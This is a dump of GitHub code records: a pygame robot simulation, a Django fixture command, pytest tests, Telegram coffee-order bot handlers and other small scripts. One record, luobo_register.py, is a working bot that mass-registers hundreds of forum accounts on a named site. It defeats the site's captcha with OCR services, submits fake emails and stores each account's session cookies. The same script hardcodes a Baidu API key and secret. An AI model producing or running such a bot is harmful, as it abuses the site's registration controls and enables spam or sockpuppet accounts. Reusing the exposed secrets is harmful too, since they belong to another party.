* wallWidth),\n rightWallMid.y + (sin(angle) * wallHeight)\n )\n \n if firstCall:\n self.start.add(LL.Vector(screenW * self.noiseIndex))\n self.end.add(LL.Vector(screenW * self.noiseIndex))\n else:\n self.start.add(LL.Vector(screenW * 1))\n self.end.add(LL.Vector(screenW * 1))\n \n def move(self):\n \n movementVector = LL.Vector(-robotSpeed, 0)\n self.start.add(movementVector)\n self.end.add(movementVector)\n if self.end.x < 0:\n self.noiseIndex = (self.noiseIndex + 2) % noiseLength\n self.setStartEnd(False)\n # self.start.add(LL.Vector(screenW*2))\n # self.end.add(LL.Vector(screenW*2))\n\n # newIndex = (self.noiseIndex + 1) % noiseLength\n # self.__init__(self.side, newIndex)\n \n def render(self, renderColour=(100,100,100), renderThickness=4):\n x1 = int(self.start.x)\n y1 = int(self.start.y)\n x2 = int(self.end.x)\n y2 = int(self.end.y)\n pygame.draw.line(\n screen, self.colour, #renderColour,\n (x1, y1), (x2, y2),\n renderThickness\n )\n\nWalls = [\n Wall('L', 0),\n Wall('R', 0),\n\n Wall('L', 1),\n Wall('R', 1)\n]\n\nclass Robot:\n def __init__(self, startFacingDirection):\n self.position = LL.Vector(screenW * 0.1, screenH * 0.5)\n self.facingDir = startFacingDirection\n\n self.radius = int(corridorWidth * 0.1)\n \n self.sensorCount = 10 # 20\n self.sensorAngle = pi * 0.75 # 0.5\n\n # self.sensorCount = 10\n # self.sensorAngle = pi * (exp(-(self.sensorCount-1.2)) + 0.65)\n\n self.sensors = [LL.Sensor() for _ in range(self.sensorCount)]\n self.updateSensors()\n\n def updateSensors(self):\n posX = int(self.position.x)\n posY = int(self.position.y)\n\n for sensor in range(self.sensorCount):\n angle = self.facingDir - (self.sensorAngle / 2) + ((self.sensorAngle / (self.sensorCount-1)) * sensor)\n sensorX = posX + (cos(angle) * self.radius)\n sensorY = posY + (sin(angle) * self.radius)\n self.sensors[sensor].update(LL.Vector(sensorX, sensorY), angle)\n self.sensors[sensor].measure(Walls)\n \n def steer(self):\n # sensorReadings = [sensor.measuredDistance for sensor in self.sensors]\n # minReading = min(sensorReadings)\n\n # sensorReadingMultipliers = [\n # sensorReadings[s] / minReading\n # for s in range(self.sensorCount)\n # ]\n\n # sC = 5\n # 0, 1, 2, 3, 4\n # (sC-1)/2 = 2.0\n # -2, -1, 0, 1, 2\n \n # sC = 8\n # 0, 1, 2, 3, 4, 5, 6, 7\n # (sC-1)/2 = 3.5\n # -3.5, -2.5, -1.5, -0.5, 0.5, 1.5, 2.5, 3.5\n\n # sC = 12\n # 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11\n # (sC-1)/2 = 5.5\n # -5.5, -4.5, -3.5, -2.5, -1.5, -0.5, 0.5, 1.5, 2.5, 3.5, 4.5, 5.5\n\n directionVectorList = []\n for s in range(self.sensorCount):\n \n angle = self.facingDir - (self.sensorAngle / 2) + ( (self.sensorAngle / (self.sensorCount-1)) * s )\n \n steeringVector = LL.Vector().fromAngle(angle)\n steeringVector.mult(self.sensors[s].measuredDistance**2)\n directionVectorList.append(steeringVector)\n \n averageVector = LL.Vector().sum(directionVectorList, True)\n\n directionDiff = averageVector.heading() - self.facingDir\n self.facingDir += (directionDiff * robotTurnRate)\n\n \n def move(self):\n self.position.y += (sin(self.facingDir) * robotSpeed)\n\n if self.position.y <= -self.radius:\n self.position.y = screenH + self.radius\n elif self.position.y > screenH + self.radius:\n self.position.y = -self.radius\n \n def render(self, fillColour=(150,150,150), outlineColour=(0,0,0), outlineThickness=2):\n x1 = int(self.position.x)\n y1 = int(self.position.y)\n pygame.draw.circle(\n screen, fillColour,\n (x1, y1), self.radius,\n 0\n )\n pygame.draw.circle(\n screen, outlineColour,\n (x1, y1), self.radius,\n outlineThickness\n )\n\n x2 = int( x1 + (cos(self.facingDir) * self.radius) )\n y2 = int( y1 + (sin(self.facingDir) * self.radius) )\n pygame.draw.line(\n screen, outlineColour,\n (x1, y1), (x2, y2),\n outlineThickness\n )\n\n for sensor in self.sensors:\n sensor.render(screen, thickness=outlineThickness)\n \nrobot = Robot(0.0)\n\n\nwhile(True):\n screen.fill((255, 255, 255))\n\n for ev in pygame.event.get():\n if ev.type == pygame.MOUSEBUTTONUP:\n mouseX, mouseY = pygame.mouse.get_pos()\n dx = mouseX - robot.position.x\n dy = mouseY - robot.position.y\n angle = atan2(dy, dx)\n robot.facingDir = angle\n\n for w in Walls:\n w.move()\n w.render()\n \n robot.updateSensors()\n robot.steer()\n robot.move()\n robot.render()\n\n pygame.display.flip()","repo_name":"Dowzer721/vsCode-Sync","sub_path":"Route Navigation/Corridor/corridor_v1.1.py","file_name":"corridor_v1.1.py","file_ext":"py","file_size_in_byte":7868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3746203650","text":"# -*- coding: utf-8 -*-\nfrom creditor.tests.fixtures.recurring import KeyholderfeeFactory, MembershipfeeFactory, RecurringTransactionFactory\nfrom django.core.management.base import BaseCommand, CommandError\n\n\nclass Command(BaseCommand):\n help = 'generate randomised recurring transactions'\n\n def add_arguments(self, parser):\n parser.add_argument('mode', type=str, choices=('totalrandom', 'membership', 'keyholder'))\n parser.add_argument('amount', type=int)\n\n def handle(self, *args, **options):\n for i in range(options['amount']):\n if options['mode'] == 'totalrandom':\n rt = RecurringTransactionFactory()\n if options['mode'] == 'membership':\n rt = MembershipfeeFactory()\n if options['mode'] == 'keyholder':\n rt = KeyholderfeeFactory()\n if options['verbosity'] > 0:\n print(\"Generated RecurringTransaction %s\" % rt)\n","repo_name":"hacklab-fi/asylum","sub_path":"project/creditor/management/commands/generate_recurring.py","file_name":"generate_recurring.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"6623406064","text":"#读目录下所有文件的第一行,写入另一文件\nimport os\nimport re\npathdir = \"G:\\\\TEST\"\nfiles = os.listdir(pathdir)\nfiles.sort(key = lambda i:int(re.search('(\\d+)',i).group()))\ntitle = \"\"\nline = \"\"\nname = \"\"\nn = 0\nfor file in files:\n all_f = open(\"%s\" %file,\"r\",encoding=\"utf-8\")\n name = file.split(\".\")[0]\n line = all_f.readline()\n n += 1\n title += name + \":\" + line + \"\\n\"\nall_f.close()\nf = open(\"100case_title.txt\" , \"w+\",encoding=\"utf-8\")\nf.write(title)\nf.close()","repo_name":"Suyiwei9527/Python_case_100","sub_path":"Gao/case135.py","file_name":"case135.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37143645850","text":"'''\r\n实现自动注册,验证码识别太低,需要训练\r\n启用图灵本地识别,识别率较高。\r\n'''\r\n\r\n#!/usr/bin/python3\r\n# -*- coding: UTF-8 -*-\r\nimport requests\r\nfrom parsel import Selector\r\nimport ddddocr\r\nfrom datetime import datetime\r\nimport time\r\nimport os\r\nimport base64\r\nfrom time import sleep\r\n\r\n\r\n# 传入文件夹名称\r\ndef tuling_ocr(img_uid):\r\n start = time.time()\r\n # 获取当前路径img文件夹的path\r\n path = os.path.dirname(__file__) + '\\\\' + img_uid\r\n misc_name = path + '\\\\' + 'misc.png'\r\n with open(misc_name, 'rb') as f:\r\n image = base64.b64encode(f.read())\r\n image_base64 = str(image).split('\\'')[1]\r\n try:\r\n url = 'http://127.0.0.1:33333/puxiuyssb?tu=' + image_base64 # 本地接口\r\n # url = 'http://114.116.115.78:33333/puxiuyssb?tu=' + image_base64 # 服务器接口\r\n result = requests.get(url=url)\r\n end = time.time()\r\n print(f\"Running time: {(end - start):.2f} Seconds\")\r\n return result.text\r\n except BaseException as e:\r\n print('接口连接失败')\r\n return '6666'\r\n\r\n# 传入文件夹字符名称,识别本地图片\r\ndef dddd_ocr(img_uid):\r\n print(datetime.now())\r\n start = time.time()\r\n ocr = ddddocr.DdddOcr()\r\n # 获取当前路径img文件夹的path\r\n path = os.path.dirname(__file__) + '\\\\' + img_uid\r\n pic_name = path + '\\\\' + 'misc.png'\r\n with open(pic_name, 'rb') as f:\r\n img_bytes = f.read()\r\n res = ocr.classification(img_bytes)\r\n try:\r\n # 可能识别不出来报错\r\n # 去掉空格\r\n # print(res)\r\n result = str(res).replace(\" \", \"\")\r\n end = time.time()\r\n print(f\"Running time: {(end - start):.2f} Seconds\")\r\n return result\r\n except BaseException as e:\r\n # 出现错误之后需要执行的程序\r\n print(\"验证码无法识别\")\r\n return 'none'\r\n\r\n# 传入文件夹名称\r\ndef baidu_ocr(img_uid):\r\n # img直接传本地图片\r\n print(datetime.now())\r\n start = time.time()\r\n # 获取access_token\r\n # client_id 为官网获取的AK, client_secret 为官网获取的SK\r\n appid = \"25876326\"\r\n client_id = \"54lekuPfz0MAFmXLsFOGZhwS\"\r\n client_secret = \"28FD1UimtkaNhZOk6jwBA08X45s88TyG\"\r\n print(\"appid:\" + appid)\r\n print(\"client_id:\" + client_id)\r\n print(\"client_secret:\" + client_secret)\r\n token_url = \"https://aip.baidubce.com/oauth/2.0/token\"\r\n host = f\"{token_url}?grant_type=client_credentials&client_id={client_id}&client_secret={client_secret}\"\r\n response = requests.get(host)\r\n access_token = response.json().get(\"access_token\")\r\n # 调用通用文字识别高精度版接口\r\n # request_url = \"https://aip.baidubce.com/rest/2.0/ocr/v1/accurate_basic\"\r\n # 网络图片文字识别接口\r\n request_url = \"https://aip.baidubce.com/rest/2.0/ocr/v1/webimage\"\r\n # 以二进制方式打开图文件\r\n # 参数image:图像base64编码\r\n # 下面图片路径请自行切换为自己环境的绝对路径\r\n # 获取当前路径img文件夹的path\r\n path = os.path.dirname(__file__) + '\\\\' + img_uid\r\n pic_name = path + '\\\\' + 'misc.png'\r\n with open(pic_name, \"rb\") as f:\r\n image = base64.b64encode(f.read())\r\n body = {\r\n \"image\": image,\r\n \"language_type\": \"auto_detect\",\r\n \"detect_direction\": \"true\",\r\n \"paragraph\": \"true\",\r\n \"probability\": \"true\",\r\n }\r\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\r\n request_url = f\"{request_url}?access_token={access_token}\"\r\n response = requests.post(request_url, headers=headers, data=body)\r\n # content = response.content.decode(\"UTF-8\")\r\n # 打印调用结果\r\n res = response.json()\r\n try:\r\n # 可能识别不出来报错\r\n results = res[\"words_result\"][0][\"words\"]\r\n # result = res[\"words_result\"][0][\"words\"]\r\n # 去掉空格\r\n result = str(results).replace(\" \", \"\")\r\n # print(result)\r\n end = time.time()\r\n print(f\"Running time: {(end - start):.2f} Seconds\")\r\n return result\r\n except BaseException as e:\r\n # 出现错误之后需要执行的程序\r\n print(\"验证码无法识别\")\r\n return '6'\r\n\r\ndef register():\r\n # 生成用户名列表,逐一注册,成功从列表删除\r\n # items = ['zzz35130', 'zzz35131', 'zzz35132', 'zzz35133', 'zzz35134', 'zzz35135']\r\n items = []\r\n for i in range(632, 1001):\r\n item = 'adsf8650' + str(i)\r\n items.append(item)\r\n\r\n while items:\r\n name = items[0]\r\n print('开始注册---' + name)\r\n # 循环,知道用户名列表为空,报错\r\n session = requests.session()\r\n register_url = 'https://bbs.6994.cn/member.php?mod=register'\r\n post_url = 'https://bbs.6994.cn/member.php?mod=register&inajax=1'\r\n register_header = {\r\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'\r\n }\r\n post_header = {\r\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36',\r\n 'referer': register_url\r\n }\r\n # 第一次访问注册页面,并记录cookies到session\r\n res1 = session.get(url=register_url, headers=register_header)\r\n # 拿到相关表单数据\r\n selector = Selector(res1.text)\r\n formhash = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/input[2]/@value').extract()[0]\r\n referer = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/input[3]/@value').extract()[0]\r\n activationauth = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/input[4]/@value').extract()[0]\r\n seccodehashs = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/div/div/span/@id').extract()[0]\r\n seccodehash = str(seccodehashs).split('_')[1]\r\n name_zd = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/div/div/div[1]/table/tr/th/label/@for').extract()[0]\r\n # print(name_zd)\r\n password1_zd = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/div/div/div[2]/table/tr/th/label/@for').extract()[0]\r\n password2_zd = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/div/div/div[3]/table/tr/th/label/@for').extract()[0]\r\n post_email_zd = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/div/div/div[4]/table/tr/th/label/@for').extract()[0]\r\n name = name\r\n password1 = name\r\n password2 = name\r\n post_email = name + '@sina.com'\r\n # 下载验证码图片\r\n misc_url = 'https://bbs.6994.cn/misc.php?mod=seccode&update=81288&idhash=' + seccodehash\r\n res_misc = session.get(url=misc_url, headers=post_header)\r\n # -------------------------下面此处需要加入返回的cookies----------------------\r\n # 将CookieJar转为字典:\r\n cookies11 = requests.utils.dict_from_cookiejar(res_misc.cookies)\r\n # 会话加入cookies\r\n for kk2, vv2 in cookies11.items():\r\n # print(kk, vv)\r\n session.cookies.set(kk2, vv2)\r\n # --------------------------上面此处需要加入返回的cookies---------------------\r\n # 当前目录下创建img文件夹\r\n if os.path.isdir('img'):\r\n pass\r\n else:\r\n print(\"当前目录下不存在 img 文件夹,调用 mkdir 创建该文件夹\")\r\n os.mkdir('img')\r\n path = os.path.dirname(__file__) + '\\\\' + 'img'\r\n pic_name = path + '\\\\' + 'misc.png'\r\n with open(pic_name, 'wb') as f:\r\n f.write(res_misc.content)\r\n print('验证码图片已下载')\r\n # 验证码识别\r\n # misc_str = dddd_ocr('img')\r\n # misc_str = baidu_ocr('img')\r\n misc_str = tuling_ocr('img')\r\n print('验证码是' + misc_str)\r\n post_data = {\r\n 'regsubmit': 'yes',\r\n 'formhash': formhash,\r\n 'referer': referer,\r\n 'activationauth':activationauth,\r\n name_zd: name,\r\n password1_zd: password1,\r\n password2_zd: password2,\r\n post_email_zd: post_email,\r\n 'seccodehash': seccodehash,\r\n 'seccodemodid': 'member::register',\r\n 'seccodeverify': misc_str\r\n }\r\n # print(post_data)\r\n res2 = session.post(url=post_url, data=post_data, headers=post_header) # 提交post数据\r\n # print(res2.text)\r\n # with open('1.html', 'w', encoding='utf-8') as f:\r\n # f.write(res2.text)\r\n res_num1 = res2.text.find('验证码填写错误')\r\n res_num2 = res2.text.find('地址无效')\r\n res_num3 = res2.text.find('感谢您注册')\r\n res_num4 = res2.text.find('地址已被注册')\r\n # print(res_num)\r\n if res_num1 > 0:\r\n print('验证码填写错误')\r\n elif res_num2 > 0:\r\n print('email地址无效')\r\n elif res_num3 > 0:\r\n print(f'注册成功----------{name}')\r\n # -------注册成功保存cookies------\r\n # 当前目录下创建cookies文件夹\r\n if os.path.isdir('cookies'):\r\n pass\r\n else:\r\n print(\"当前目录下不存在 cookies文件夹,调用 mkdir 创建该文件夹\")\r\n os.mkdir('cookies')\r\n path = os.path.dirname(__file__) + '\\\\' + 'cookies'\r\n cookie_name = path + '\\\\' + f'{name}.txt'\r\n # 写文件\r\n res_home = session.get('https://bbs.6994.cn/', headers=register_header)\r\n # with open('1.html', 'w', encoding='utf-8') as f:\r\n # f.write(res_home.text)\r\n cookies11 = requests.utils.dict_from_cookiejar(session.cookies) # 将CookieJar转为字典:\r\n with open(cookie_name, 'w', encoding='utf-8') as f:\r\n f.write(str(cookies11))\r\n # -------注册成功保存cookies------\r\n items.remove(name)\r\n elif res_num4 > 0:\r\n print(f'已被注册-------{name}')\r\n items.remove(name)\r\n sleep(5)\r\n print('')\r\n session.close()\r\n\r\nif __name__ == '__main__':\r\n register()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"bluesky2030/python-dome","sub_path":"luobo_register.py","file_name":"luobo_register.py","file_ext":"py","file_size_in_byte":10414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28183473610","text":"import pytest\n\nfrom collections import OrderedDict\nfrom itertools import product\nfrom metalearn.components.algorithm_component import AlgorithmComponent\nfrom metalearn.data_types import AlgorithmType, HyperparamType\nfrom sklearn.base import BaseEstimator\n\n\nclass MockEstimator(BaseEstimator):\n\n def __init__(self, hyperparameter1=1, hyperparameter2=\"a\",\n categorical_features=None, continuous_features=None):\n self.hyperparameter1 = hyperparameter1\n self.hyperparameter2 = hyperparameter1\n self.categorical_features = categorical_features\n self.continuous_features = continuous_features\n\n\nclass MockHyperparameter(object):\n\n def __init__(self, name, state_space):\n self.hname = name\n self.state_space = state_space\n\n def get_state_space(self, *args, **kwargs):\n return {\n \"type\": HyperparamType.CATEGORICAL,\n \"choices\": self.state_space,\n }\n\n\nMOCK_HYPERPARAMS = [\n MockHyperparameter(\"hyperparameter1\", [1, 2, 3]),\n MockHyperparameter(\"hyperparameter2\", [\"a\", \"b\", \"c\"])\n]\n\n\ndef _algorithm_component(\n component_type=AlgorithmType.CLASSIFIER,\n initialize_component=None,\n hyperparameters=None,\n exclusion_conditions=None):\n return AlgorithmComponent(\n name=\"TestComponent\",\n component_class=MockEstimator,\n component_type=component_type,\n initialize_component=initialize_component,\n hyperparameters=hyperparameters,\n exclusion_conditions=exclusion_conditions)\n\n\ndef test_init():\n \"\"\"Test happy path initialization and error case.\"\"\"\n algorithm_component = _algorithm_component()\n assert isinstance(algorithm_component, AlgorithmComponent)\n\n with pytest.raises(ValueError):\n _algorithm_component(\"FOOBAR\")\n\n\ndef test_call():\n \"\"\"Test __call__ method correctly instantiates the algorithm object.\"\"\"\n algorithm_component = _algorithm_component()\n algorithm_obj = algorithm_component()\n assert isinstance(algorithm_obj, MockEstimator)\n assert hasattr(algorithm_obj, \"hyperparameter1\")\n assert hasattr(algorithm_obj, \"hyperparameter2\")\n\n\ndef test_hyperparameter_name_space():\n \"\"\"Test name space is correctly formatted.\"\"\"\n algorithm_component = _algorithm_component(\n hyperparameters=MOCK_HYPERPARAMS)\n expected = [\n \"TestComponent__hyperparameter1\",\n \"TestComponent__hyperparameter2\"]\n result = algorithm_component.hyperparameter_name_space()\n assert result == expected\n\n algorithm_component_none = _algorithm_component(hyperparameters=None)\n assert algorithm_component_none.hyperparameter_name_space() is None\n\n\ndef test_hyperparameter_state_space():\n \"\"\"Test hyperparameter state space contains correct hyperparameters.\"\"\"\n algorithm_component = _algorithm_component(\n hyperparameters=MOCK_HYPERPARAMS)\n state_space = algorithm_component.hyperparameter_state_space()\n assert (\n state_space[\"TestComponent__hyperparameter1\"][\"choices\"] == [1, 2, 3]\n )\n assert (\n state_space[\"TestComponent__hyperparameter2\"][\"choices\"]\n == [\"a\", \"b\", \"c\"]\n )\n assert _algorithm_component(\n hyperparameters=None).hyperparameter_state_space() == OrderedDict()\n\n\ndef test_hyperparameter_iterator():\n \"\"\"Test that hyperparameter iterator returns all possible combinations.\"\"\"\n algorithm_component = _algorithm_component(\n hyperparameters=MOCK_HYPERPARAMS)\n hyperparam_settings = list(algorithm_component.hyperparameter_iterator())\n hnames = [\n \"TestComponent__hyperparameter1\",\n \"TestComponent__hyperparameter2\"]\n for settings in (dict(zip(hnames, s)) for s in\n product([1, 2, 3], [\"a\", \"b\", \"c\"])):\n assert settings in hyperparam_settings\n\n\ndef test_hyperparameter_exclusion_conditions():\n \"\"\"Test that exclusion conditions correctly render exclusion mask.\"\"\"\n algorithm_component = _algorithm_component(\n hyperparameters=MOCK_HYPERPARAMS,\n # if `1` is chosen on hyperparameter1, then exclude values \"b\", and \"c\"\n # on hyperparameter2\n exclusion_conditions={\n \"hyperparameter1\": {1: {\"hyperparameter2\": [\"b\", \"c\"]}}})\n expected = OrderedDict([\n (\"TestComponent__hyperparameter1\", {\n 1: {\"TestComponent__hyperparameter2\": [\"b\", \"c\"]}})\n ])\n assert algorithm_component.hyperparameter_exclusion_conditions() == \\\n expected\n\n\ndef test_initialize_component():\n \"\"\"Test that initialize component creates estimator with task metadata.\"\"\"\n\n def init_component(\n component_class, categorical_features, continuous_features):\n return component_class(\n categorical_features=categorical_features,\n continuous_features=continuous_features)\n\n algorithm_component = _algorithm_component(\n initialize_component=init_component,\n hyperparameters=MOCK_HYPERPARAMS)\n\n for cat_feat, cont_feat in [\n ([1, 2, 3], [10, 11, 12]),\n ([1, 2, 3], [10, 11, 12]),\n ]:\n estimator = algorithm_component(\n categorical_features=[1, 2, 3],\n continuous_features=[10, 11, 12])\n assert estimator.categorical_features == [1, 2, 3]\n assert estimator.continuous_features == [10, 11, 12]\n\n # case where init_component is None\n algorithm_component = _algorithm_component(\n initialize_component=None,\n hyperparameters=MOCK_HYPERPARAMS)\n\n estimator = algorithm_component(\n categorical_features=[1, 2, 3],\n continuous_features=[10, 11, 12])\n assert estimator.categorical_features is None\n assert estimator.continuous_features is None\n\n\ndef test_initialize_component_exceptions():\n \"\"\"Test function signature exceptions of init_component.\"\"\"\n\n algorithm_component = _algorithm_component(\n initialize_component=lambda: None)\n\n # function signature needs to be:\n # (component: Estimator|Transformer,\n # categorical_features: List[int],\n # categorical_features: List[int]) -> Estimator\n for fn in [\n lambda: None,\n lambda x: None,\n lambda x, y: None,\n lambda x, y, z, _: None,\n ]:\n with pytest.raises(TypeError):\n algorithm_component = _algorithm_component(\n initialize_component=fn)\n algorithm_component()\n\n # Test estimator is returned\n for fn in [\n lambda component_class, cat_feats, cont_feats: component_class(\n categorical_features=cat_feats,\n continuous_features=cont_feats),\n lambda component_class, *args: component_class()\n ]:\n\n algorithm_component = _algorithm_component(\n initialize_component=fn)\n assert isinstance(algorithm_component(), BaseEstimator)\n\n # when algorithm component output is not an estimator\n for fn in [\n lambda x, y, z: None,\n lambda x, y, z: \"foobar\",\n lambda x, y, z: 1,\n lambda x, y, z: 0.0511235,\n lambda x, y, z: [],\n lambda x, y, z: {},\n ]:\n with pytest.raises(TypeError):\n algorithm_component = _algorithm_component(\n initialize_component=fn)\n algorithm_component()\n","repo_name":"cosmicBboy/ml-research","sub_path":"metalearn/tests/unit_tests/test_algorithm_component.py","file_name":"test_algorithm_component.py","file_ext":"py","file_size_in_byte":7329,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"42392061810","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom aiogram import types\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\n\nfrom config import Time, ME\nimport text\nimport keyboard as kb\nfrom misc import dp, bot, db, wfp\nimport datetime\n\n\nclass OrderStates(StatesGroup):\n storage = MemoryStorage()\n get_phone_number = State()\n grind_coffee_pack = State()\n type_of_grind = State()\n set_delivery_spot = State()\n get_address = State()\n get_arriving_time = State()\n\n\nasync def alert_admins(message):\n admins = db.get_admins()\n await bot.send_message(ME, message)\n # for admin in admins:\n # await bot.send_message(admin[0], message)\n\n\nasync def organize_info(user_id, data):\n cart_items = db.get_cart_items(user_id)\n try:\n grind_type = f\"\\nкаву змолоти під {data['grind_type']}\\n\"\n except:\n grind_type = \"\"\n try:\n delivery_address = f\"🚕 доставка на таксі: {data['address']}\"\n except:\n delivery_address = \"📍 забере сам через\"\n try:\n arriving_time = f\"{data['arriving_time']} хв\"\n except:\n arriving_time = \"\"\n user_number = db.get_user_number(user_id)\n ret = wfp.create_ticket(user_id, cart_items, delivery_address)\n formatted_reply = f\"🛍 нове замовлення від: {user_number}\\n📲 id: {user_id}\\n{delivery_address} {arriving_time}\\n\" \\\n f\"📩 номер замовлення: {ret['order_reference']}\\n\\n\"\n price = 0\n for item in cart_items:\n formatted_reply += f\"{item['name']} \\n\"\n price += item['price']\n formatted_reply += grind_type\n formatted_reply += f\"\\n💸 усього на {price} грн.\"\n await bot.send_message(user_id, ret[\"link\"])\n await bot.send_message(user_id, text.WAITING_FOR_PAY, reply_markup=kb.main_kb)\n await alert_admins(message=formatted_reply)\n\n\n@dp.message_handler(lambda message: message.text and text.BACK in message.text, state=\"*\")\nasync def back_button_pressed(message: types.Message, state: FSMContext):\n await state.finish()\n await bot.send_message(message[\"from\"].id, text.WELCOME_MESSAGE, reply_markup=kb.main_kb)\n\n\n@dp.message_handler(content_types=types.ContentTypes.CONTACT, state=OrderStates.get_phone_number)\nasync def update_phone_number(message: types.Message, state: FSMContext):\n db.update_phone_number(message[\"from\"].id, message.contact['phone_number'])\n data = await state.get_data()\n await organize_info(user_id=message[\"from\"].id, data=data)\n await state.finish()\n\n\n@dp.message_handler(lambda message: message.text and text.CREATE_ORDER in message.text)\nasync def create_order(message: types.Message):\n cart_items = db.get_cart_items(message[\"from\"].id)\n\n def include_coffee_pack() -> bool:\n for item in cart_items:\n if item[\"type\"] == \"coffee\":\n return True\n return False\n\n t = datetime.datetime.utcnow().hour + Time.UTC_DIFF\n if t > Time.CAFE_CLOSES - 1 or t < Time.CAFE_OPENS:\n await bot.send_message(message[\"from\"].id, text.CAFE_IS_CLOSED, reply_markup=kb.main_kb)\n return\n\n if len(cart_items) < 1:\n await bot.send_message(message[\"from\"].id, text.CART_CANNOT_BE_EMPTY, reply_markup=kb.main_kb)\n return\n if include_coffee_pack():\n await OrderStates.grind_coffee_pack.set()\n await bot.send_message(message[\"from\"].id, text=text.COFFEE_PACK_IS_IN_MENU, reply_markup=kb.choise_kb)\n else:\n await OrderStates.set_delivery_spot.set()\n await bot.send_message(message[\"from\"].id, text.SET_DELIVERY_SPOT, reply_markup=kb.delivery_spot_kb)\n\n\n@dp.message_handler(content_types=types.ContentTypes.TEXT, state=OrderStates.grind_coffee_pack)\nasync def set_coffee_pack_grind(message: types.Message, state: FSMContext):\n if message.text == text.YES:\n await state.update_data(to_grind=text.YES)\n await OrderStates.type_of_grind.set()\n await bot.send_message(message[\"from\"].id, text.CHOOSE_GRIND_TYPE, reply_markup=kb.grind_types_kb)\n elif message.text == text.NO:\n await OrderStates.set_delivery_spot.set()\n await state.update_data(to_grind=text.NO)\n await bot.send_message(message[\"from\"].id, text.SET_DELIVERY_SPOT, reply_markup=kb.delivery_spot_kb)\n else:\n return\n\n\n@dp.message_handler(content_types=types.ContentTypes.TEXT, state=OrderStates.type_of_grind)\n@dp.message_handler(lambda message: message.text and text.YES in message.text)\nasync def set_type_of_grind(message: types.Message, state: FSMContext):\n if message.text in text.GRIND_TYPES:\n await state.update_data(grind_type=message.text)\n await OrderStates.set_delivery_spot.set()\n await bot.send_message(message[\"from\"].id, text.SET_DELIVERY_SPOT, reply_markup=kb.delivery_spot_kb)\n else:\n await bot.send_message(message[\"from\"].id, text.CHOOSE_GRIND_TYPE, reply_markup=kb.grind_types_kb)\n return\n\n\n@dp.message_handler(content_types=types.ContentTypes.TEXT, state=OrderStates.set_delivery_spot)\n@dp.message_handler(lambda message: message.text and text.DELIVERY_OLC or text.DELIVERY_TAXI in message.text)\nasync def set_delivery_spot(message: types.Message, state: FSMContext):\n if message.text == text.DELIVERY_OLC:\n await state.update_data(delivery=text.DELIVERY_OLC)\n await OrderStates.get_arriving_time.set()\n await bot.send_message(message[\"from\"].id, text.TYPE_ARRIVING_TIME)\n elif message.text == text.DELIVERY_TAXI:\n await OrderStates.get_address.set()\n await bot.send_message(message[\"from\"].id, text.TYPE_DELIVERY_ADDRESS)\n\n\n@dp.message_handler(content_types=types.ContentTypes.TEXT, state=OrderStates.get_address)\nasync def get_address(message: types.Message, state: FSMContext):\n if len(message.text) > 4:\n await state.update_data(address=message.text.lower())\n else:\n await bot.send_message(message[\"from\"].id, text.TYPE_DELIVERY_ADDRESS)\n return\n # await bot.send_message(message[\"from\"].id, await state.get_data())\n if db.get_user_number(message[\"from\"].id) == 0:\n await OrderStates.get_phone_number.set()\n await bot.send_message(chat_id=message[\"from\"].id, text=text.SHARE_YOUR_NUMBER, reply_markup=kb.share_phone_kb)\n else:\n data = await state.get_data()\n await organize_info(user_id=message[\"from\"].id, data=data)\n await state.finish()\n\n\n@dp.message_handler(content_types=types.ContentTypes.TEXT, state=OrderStates.get_arriving_time)\nasync def get_time(message: types.Message, state: FSMContext):\n def process_time(item: str) -> int:\n if item.isdigit():\n return int(item)\n else:\n if item[0:2].isdigit():\n return int(item[0:2])\n elif item[0:1].isdigit():\n return int(item[0:1])\n else:\n return -1\n\n time_data = message.text.split(\" \")[0]\n time = 0\n if time_data.isdigit():\n time = int(time_data)\n else:\n time = process_time(message.text)\n if time != 0:\n await state.update_data(arriving_time=time)\n else:\n await bot.send_message(message[\"from\"].id, text.TYPE_ARRIVING_TIME)\n return\n if db.get_user_number(message[\"from\"].id) == 0:\n await OrderStates.get_phone_number.set()\n await bot.send_message(chat_id=message[\"from\"].id, text=text.SHARE_YOUR_NUMBER, reply_markup=kb.share_phone_kb)\n else:\n data = await state.get_data()\n await organize_info(user_id=message[\"from\"].id, data=data)\n await state.finish()\n","repo_name":"riaronc/olc_bot","sub_path":"handlers/order_handlers.py","file_name":"order_handlers.py","file_ext":"py","file_size_in_byte":7717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40571138879","text":"from typing import List\nimport numpy as np\nimport os\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.python.ops.gen_array_ops import 